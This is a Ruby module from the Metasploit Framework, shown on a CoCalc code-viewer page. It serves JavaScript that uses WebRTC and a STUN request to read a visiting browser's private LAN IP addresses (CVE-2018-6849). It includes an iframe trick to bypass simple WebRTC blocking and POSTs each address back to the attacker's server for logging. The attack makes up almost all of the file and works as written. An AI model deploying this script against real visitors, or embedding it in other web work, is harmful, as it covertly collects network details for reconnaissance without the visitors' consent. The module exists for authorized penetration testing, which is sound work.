CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/gather/browser_lanipleak.rb
Views: 11780
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::HttpServer

8


9
  def initialize(info = {})

10
    super(

11
      update_info(

12
        info,

13
        'Name'           => 'HTTP Client LAN IP Address Gather',

14
        'Description'    => %q(

15
          This module retrieves a browser's network interface IP addresses

16
          using WebRTC.

17
        ),

18
        'License'        => MSF_LICENSE,

19
        'Author'         => [

20
          'Daniel Roesler', # JS Code

21
          'Dhiraj Mishra'   # MSF Module

22
         ],

23
        'References'     => [

24
           [ 'CVE', '2018-6849' ],

25
           [ 'URL', 'http://net.ipcalf.com/' ],

26
           [ 'URL', 'https://www.inputzero.io/p/private-ip-leakage-using-webrtc.html' ]

27
         ],

28
        'DisclosureDate' => '2013-09-05',

29
        'Actions'        => [[ 'WebServer', 'Description' => 'Serve exploit via web server' ]],

30
        'PassiveActions' => [ 'WebServer' ],

31
        'DefaultAction'  => 'WebServer'

32
      )

33
    )

34
  end

35


36
  def run

37
    exploit # start http server

38
  end

39


40
  def setup

41
     # code from: https://github.com/diafygi/webrtc-ips

42
     @html = <<-JS

43
<script>

44
//get the IP addresses associated with an account

45
function getIPs(callback){

46
    var ip_dups = {};

47


48
    //compatibility for firefox and chrome

49
    var RTCPeerConnection = window.RTCPeerConnection

50
        || window.mozRTCPeerConnection

51
        || window.webkitRTCPeerConnection;

52
    var useWebKit = !!window.webkitRTCPeerConnection;

53


54
    //bypass naive webrtc blocking using an iframe

55
    if(!RTCPeerConnection){

56
        //NOTE: you need to have an iframe in the page right above the script tag

57
        //

58
        //<iframe id="iframe" sandbox="allow-same-origin" style="display: none"></iframe>

59
        //<script>...getIPs called in here...

60
        //

61
        var win = iframe.contentWindow;

62
        RTCPeerConnection = win.RTCPeerConnection

63
            || win.mozRTCPeerConnection

64
            || win.webkitRTCPeerConnection;

65
        useWebKit = !!win.webkitRTCPeerConnection;

66
    }

67


68
    //minimal requirements for data connection

69
    var mediaConstraints = {

70
        optional: [{RtpDataChannels: true}]

71
    };

72


73
    var servers = {iceServers: [{urls: "stun:stun.services.mozilla.com"}]};

74


75
    //construct a new RTCPeerConnection

76
    var pc = new RTCPeerConnection(servers, mediaConstraints);

77


78
    function handleCandidate(candidate){

79
        //match just the IP address

80
        var ip_regex = /([0-9]{1,3}(\\.[0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})/

81
        var ip_addr = ip_regex.exec(candidate)[1];

82


83
        //remove duplicates

84
        if(ip_dups[ip_addr] === undefined)

85
            callback(ip_addr);

86


87
        ip_dups[ip_addr] = true;

88
    }

89


90
    //listen for candidate events

91
    pc.onicecandidate = function(ice){

92


93
        //skip non-candidate events

94
        if(ice.candidate)

95
            handleCandidate(ice.candidate.candidate);

96
    };

97


98
    //create a bogus data channel

99
    pc.createDataChannel("");

100


101
    //create an offer sdp

102
    pc.createOffer(function(result){

103


104
        //trigger the stun server request

105
        pc.setLocalDescription(result, function(){}, function(){});

106


107
    }, function(){});

108


109
    //wait for a while to let everything done

110
    setTimeout(function(){

111
        //read candidate info from local description

112
        var lines = pc.localDescription.sdp.split('\\n');

113


114
        lines.forEach(function(line){

115
            if(line.indexOf('a=candidate:') === 0)

116
                handleCandidate(line);

117
        });

118
    }, 1000);

119
}

120


121
getIPs(function(ip){

122
  //console.log(ip);

123
  var xmlhttp = new XMLHttpRequest;

124
  xmlhttp.open('POST', window.location, true);

125
  xmlhttp.send(ip);

126
});

127
</script>

128
     JS

129
  end

130


131
  def on_request_uri(cli, request)

132
    case request.method.downcase

133
    when 'get'

134
      print_status("#{cli.peerhost}: Sending response (#{@html.size} bytes)")

135
      send_response(cli, @html)

136
    when 'post'

137
      begin

138
        ip = request.body

139
        if ip =~ /\A([0-9]{1,3}(\.[0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})\z/

140
          print_good("#{cli.peerhost}: Found IP address: #{ip}")

141
        else

142
          print_error("#{cli.peerhost}: Received malformed IP address")

143
        end

144
      rescue

145
        print_error("#{cli.peerhost}: Received malformed reply")

146
      end

147
    else

148
      print_error("#{cli.peerhost}: Unhandled method: #{request.method}")

149
    end

150
  end

151
end

152


153